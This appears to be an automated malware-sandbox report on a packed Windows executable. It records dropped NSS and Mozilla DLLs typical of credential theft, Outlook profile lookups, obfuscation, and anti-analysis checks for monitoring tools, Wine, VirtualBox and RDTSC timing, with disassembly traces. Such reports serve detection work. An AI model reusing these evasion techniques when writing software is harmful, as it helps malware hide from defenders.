Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1853440 > 1048576

Source: file.exe

Static PE information: Raw size of exbnbhbd is bigger than: 0x100000 < 0x19e400

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.760000.0.unpack :EW;.rsrc :W;.idata :W; :EW;exbnbhbd:EW;krctzlzf:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;exbnbhbd:EW;krctzlzf:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00779860

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x1c4c58 should be: 0x1d3f0e

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: exbnbhbd
Source: file.exe	Static PE information: section name: krctzlzf
Source: file.exe	Static PE information: section name: .taggant
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C188E9 push edx; mov dword ptr [esp], ebp	0_2_00C1890F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C188E9 push esi; mov dword ptr [esp], eax	0_2_00C1891F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A9209D push edx; mov dword ptr [esp], 2993B214h	0_2_00A920D9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A9209D push 274B5F8Fh; mov dword ptr [esp], edx	0_2_00A920F6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A9209D push 2CE25BCAh; mov dword ptr [esp], edi	0_2_00A92204
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A9209D push 41D85D98h; mov dword ptr [esp], edi	0_2_00A92302
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A9209D push eax; mov dword ptr [esp], edx	0_2_00A9231F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AA6894 push ebp; mov dword ptr [esp], edx	0_2_00AA6940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AA6894 push edx; mov dword ptr [esp], eax	0_2_00AA6995
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0077B035 push ecx; ret	0_2_0077B048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ACF0EF push eax; mov dword ptr [esp], 26BFC402h	0_2_00ACF15E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ACF0EF push ecx; mov dword ptr [esp], esi	0_2_00ACF187
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ACF0EF push edi; mov dword ptr [esp], F00C9201h	0_2_00ACF1CD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA08CB push ebp; mov dword ptr [esp], edx	0_2_00BA0983
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA08CB push ebp; mov dword ptr [esp], eax	0_2_00BA09E9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push 3DADE61Dh; mov dword ptr [esp], ecx	0_2_00B2D8CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push 434890FBh; mov dword ptr [esp], edi	0_2_00B2D8EA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push ebp; mov dword ptr [esp], eax	0_2_00B2D8F3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push esi; mov dword ptr [esp], ebx	0_2_00B2D979
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push 169C3BECh; mov dword ptr [esp], esi	0_2_00B2D9B4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push esi; mov dword ptr [esp], edi	0_2_00B2DA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push 57922002h; mov dword ptr [esp], ecx	0_2_00B2DA6F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push ebx; mov dword ptr [esp], 051C2B00h	0_2_00B2DADF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push ecx; mov dword ptr [esp], 6E6DEFF6h	0_2_00B2DAEA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push eax; mov dword ptr [esp], esp	0_2_00B2DB27
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push 701F7537h; mov dword ptr [esp], edi	0_2_00B2DC74
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push edi; mov dword ptr [esp], 3FDFFC24h	0_2_00B2DC78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push edx; mov dword ptr [esp], ebp	0_2_00B2DCF7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push 2FCD5FD7h; mov dword ptr [esp], eax	0_2_00B2DD04
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push eax; mov dword ptr [esp], edi	0_2_00B2DDC1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0 push 5EADB701h; mov dword ptr [esp], edx	0_2_00B2DE30

Source: file.exe

Static PE information: section name: exbnbhbd entropy: 7.953344026869935

Drops PE files

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_00779860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B33F0A second address: B33F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B33F15 second address: B33F19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B33F19 second address: B33F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3F960 second address: B3F99B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FB8FCCA77C1h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jl 00007FB8FCCA77CCh 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FB8FCCA77C4h 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push esi 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3FC44 second address: B3FC48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3FC48 second address: B3FC67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCCA77C5h 0x00000007 jbe 00007FB8FCCA77B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3FC67 second address: B3FC6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B400BA second address: B400BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B40208 second address: B40218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCD6487Bh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B43189 second address: B4318F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4327C second address: B43298 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD64888h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B43298 second address: B432A2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB8FCCA77BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B432A2 second address: B432C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB8FCD64885h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B432C0 second address: B432C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B432C6 second address: B432EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007FB8FCD6487Ch 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 pushad 0x00000015 jnc 00007FB8FCD64876h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B432EA second address: B432F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B432F2 second address: B43304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B43304 second address: B43360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [ebp+122D1B4Dh], edi 0x0000000d push 00000003h 0x0000000f mov dword ptr [ebp+122D1A58h], ebx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007FB8FCCA77B8h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 mov esi, 0577DAD1h 0x00000036 push 00000003h 0x00000038 mov esi, 7620C8CEh 0x0000003d call 00007FB8FCCA77B9h 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FB8FCCA77BAh 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B43360 second address: B4336A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB8FCD6487Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4336A second address: B43381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pop edx 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B43381 second address: B43398 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB8FCD6487Ch 0x00000008 jo 00007FB8FCD64876h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B43398 second address: B4339C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4339C second address: B433A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B433A0 second address: B43409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FB8FCCA77BEh 0x00000012 jmp 00007FB8FCCA77BCh 0x00000017 popad 0x00000018 pop eax 0x00000019 pop eax 0x0000001a jmp 00007FB8FCCA77C0h 0x0000001f lea ebx, dword ptr [ebp+12454FBFh] 0x00000025 mov dword ptr [ebp+122D1AA6h], edi 0x0000002b xchg eax, ebx 0x0000002c push eax 0x0000002d jmp 00007FB8FCCA77C5h 0x00000032 pop eax 0x00000033 push eax 0x00000034 je 00007FB8FCCA77CEh 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B43409 second address: B4340D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B434C2 second address: B4353C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 jns 00007FB8FCCA77B6h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop ecx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push edi 0x00000017 jmp 00007FB8FCCA77BBh 0x0000001c pop edi 0x0000001d mov eax, dword ptr [eax] 0x0000001f jnc 00007FB8FCCA77C8h 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 push edi 0x0000002a push edi 0x0000002b jne 00007FB8FCCA77B6h 0x00000031 pop edi 0x00000032 pop edi 0x00000033 pop eax 0x00000034 and esi, dword ptr [ebp+122D2984h] 0x0000003a push 00000003h 0x0000003c sub dword ptr [ebp+122D19B2h], ecx 0x00000042 mov edi, dword ptr [ebp+122D2954h] 0x00000048 push 00000000h 0x0000004a mov edi, dword ptr [ebp+122D28D8h] 0x00000050 mov dh, CFh 0x00000052 push 00000003h 0x00000054 or cx, 5AACh 0x00000059 push B90D3E36h 0x0000005e push esi 0x0000005f push ebx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6185A second address: B61886 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB8FCD64876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB8FCD6487Ah 0x00000011 jmp 00007FB8FCD64886h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B61A90 second address: B61A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B61A94 second address: B61AB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB8FCD64884h 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B61F99 second address: B61F9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B62114 second address: B6211A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6211A second address: B6212B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB8FCCA77B6h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6212B second address: B62145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jmp 00007FB8FCD64883h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B62145 second address: B62151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnc 00007FB8FCCA77B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B622B1 second address: B622B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B622B5 second address: B622C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB8FCCA77B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B622C1 second address: B622D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCD6487Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B622D2 second address: B622D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B622D6 second address: B622F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCD6487Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c js 00007FB8FCD64876h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B56812 second address: B56818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B56818 second address: B5681C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6313B second address: B63141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6705D second address: B67061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B66126 second address: B6612C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6612C second address: B66130 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6B11C second address: B6B122 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B24D5B second address: B24D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B24D61 second address: B24D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6DE71 second address: B6DE82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCD6487Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6DE82 second address: B6DEAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCCA77C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jns 00007FB8FCCA77B6h 0x00000010 jg 00007FB8FCCA77B6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B6E00D second address: B6E011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
